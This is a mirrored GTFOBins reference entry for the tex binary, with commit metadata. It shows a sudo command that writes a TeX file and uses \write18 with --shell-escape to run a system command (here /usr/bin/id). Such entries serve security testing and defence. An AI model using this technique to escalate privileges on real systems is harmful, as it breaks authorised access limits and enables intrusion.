1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-02 21:51:39 +01:00
GTFOBins.github.io/_gtfobins/tex.md
SynackCerv 8c08101fed
Create tex.md
Add tex.
2021-04-22 22:13:08 +02:00

280 B

description: tex has a similar behaviour as pdftex functions: sudo: - code: | echo "\documentclass[12pt]{article} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex tex -interaction=nonstopmode --shell-escape file.tex